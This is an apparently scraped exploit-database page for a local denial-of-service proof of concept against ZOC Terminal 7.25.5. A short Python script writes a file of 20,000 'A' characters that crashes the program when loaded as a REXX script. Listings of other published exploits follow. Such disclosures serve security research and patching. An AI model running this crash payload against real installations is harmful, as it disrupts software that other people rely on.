Search for hundreds of thousands of exploits

"ZOC Terminal 7.25.5 - 'Script' Denial of Service (PoC)"

Author

Exploit author

chuyreds

Platform

Exploit platform

windows

Release date

Exploit published date

2020-04-07

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
# Exploit Title: ZOC Terminal 7.25.5 - 'Script' Denial of Service (PoC)
# Discovery by: chuyreds
# Discovery Date: 2020-04-05
# Vendor Homepage: https://www.emtec.com
# Software Link : http://www.emtec.com/downloads/zoc/zoc7255_x64.exe
# Tested Version: 7.25.5
# Vulnerability Type: Local
# Tested on OS: Windows 10 Pro x64 es

# Steps to produce the crash:
# 1.- Run python code: ZOC_7.25.5_Script.py and it will create a new file "exp.zrx"
# 2.- Open ZOC Terminal
# 3.- Select Script > Start REXX Script... 
# 4.- Select "ZOC_7.25.5_Script.zrx" file and click "open"
# 5.- Crashed

cod = "\x41" * 20000

f = open('ZOC_7.25.5_Script.zrx', 'w')
f.write(cod)
f.close()
Release DateTitleTypePlatformAuthor
2020-06-01"QuickBox Pro 2.1.8 - Authenticated Remote Code Execution"webappsphps1gh
2020-06-01"Wordpress Plugin BBPress 2.5 - Unauthenticated Privilege Escalation"webappsphp"Raphael Karger"
2020-06-01"VMware vCenter Server 6.7 - Authentication Bypass"webappsmultiplePhotubias
2020-05-29"Crystal Shard http-protection 0.2.0 - IP Spoofing Bypass"webappsmultiple"Halis Duraki"
2020-05-29"WordPress Plugin Multi-Scheduler 1.0.0 - Cross-Site Request Forgery (Delete User)"webappsphpUnD3sc0n0c1d0
2020-05-28"Online-Exam-System 2015 - 'fid' SQL Injection"webappsphp"Berk Dusunur"
2020-05-28"EyouCMS 1.4.6 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-28"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution"webappsphpTh3GundY
2020-05-28"NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection"webappsmultiple"Berk Dusunur"
2020-05-27"LimeSurvey 4.1.11 - 'Permission Roles' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
Release DateTitleTypePlatformAuthor
2020-05-26"StreamRipper32 2.6 - Buffer Overflow (PoC)"localwindows"Andy Bowden"
2020-05-25"Plesk/myLittleAdmin - ViewState .NET Deserialization (Metasploit)"remotewindowsMetasploit
2020-05-25"GoldWave - Buffer Overflow (SEH Unicode)"localwindows"Andy Bowden"
2020-05-22"Filetto 1.0 - 'FEAT' Denial of Service (PoC)"doswindowsSocket_0x03
2020-05-22"VUPlayer 2.49 .m3u - Local Buffer Overflow (DEP_ASLR)"localwindowsGobinathan
2020-05-22"Konica Minolta FTP Utility 1.0 - 'LIST' Denial of Service (PoC)"doswindowsSocket_0x03
2020-05-22"Druva inSync Windows Client 6.6.3 - Local Privilege Escalation"localwindows"Matteo Malvica"
2020-05-22"Konica Minolta FTP Utility 1.0 - 'NLST' Denial of Service (PoC)"doswindowsSocket_0x03
2020-05-21"CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR)"localwindows"Xenofon Vassilakopoulos"
2020-05-21"AbsoluteTelnet 11.21 - 'Username' Denial of Service (PoC)"doswindows"Xenofon Vassilakopoulos"
Release DateTitleTypePlatformAuthor
2020-04-10"AbsoluteTelnet 11.12 - 'SSH1/username' Denial of Service (PoC)"doswindowschuyreds
2020-04-07"ZOC Terminal 7.25.5 - 'Script' Denial of Service (PoC)"doswindowschuyreds
2020-04-06"Memu Play 7.1.3 - Insecure Folder Permissions"localwindowschuyreds
2020-04-06"UltraVNC Launcher 1.2.4.0 - 'RepeaterHost' Denial of Service (PoC)"doswindowschuyreds
2020-04-06"UltraVNC Launcher 1.2.4.0 - 'Password' Denial of Service (PoC)"doswindowschuyreds
2020-04-06"UltraVNC Viewer 1.2.4.0 - 'VNCServer' Denial of Service (PoC)"doswindowschuyreds
2020-04-06"ZOC Terminal v7.25.5 - 'Private key file' Denial of Service (PoC)"doswindowschuyreds
2020-02-06"TapinRadio 2.12.3 - 'address' Denial of Service (PoC)"doswindowschuyreds
2020-02-06"TapinRadio 2.12.3 - 'username' Denial of Service (PoC)"doswindowschuyreds
2020-02-06"RarmaRadio 2.72.4 - 'username' Denial of Service (PoC)"doswindowschuyreds
2020-02-06"RarmaRadio 2.72.4 - 'server' Denial of Service (PoC)"doswindowschuyreds
2020-02-06"AbsoluteTelnet 11.12 - 'SSH2/username' Denial of Service (PoC)"doswindowschuyreds
2020-02-06"AbsoluteTelnet 11.12 - _license name_ Denial of Service (PoC)"doswindowschuyreds
2020-02-06"AbsoluteTelnet 11.12 - 'license name' Denial of Service (PoC)"doswindowschuyreds
2019-11-26"InduSoft Web Studio 8.1 SP1 - _Atributos_ Denial of Service (PoC)"doswindowschuyreds
2019-11-25"InTouch Machine Edition 8.1 SP1 - 'Atributos' Denial of Service (PoC)"doswindowschuyreds
2019-11-18"Foscam Video Management System 1.1.4.9 - 'Username' Denial of Service (PoC)"doswindowschuyreds
2019-11-12"Wondershare Application Framework Service 2.4.3.231 - 'WsAppService' Unquote Service Path"localwindowschuyreds
2019-11-12"RTK IIS Codec Service 6.4.10041.133 - 'RtkI2SCodec' Unquote Service Path"localwindowschuyreds
2019-11-12"Wondershare Application Framework Service - _WsAppService_ Unquote Service Path"localwindowschuyreds
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/48302/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.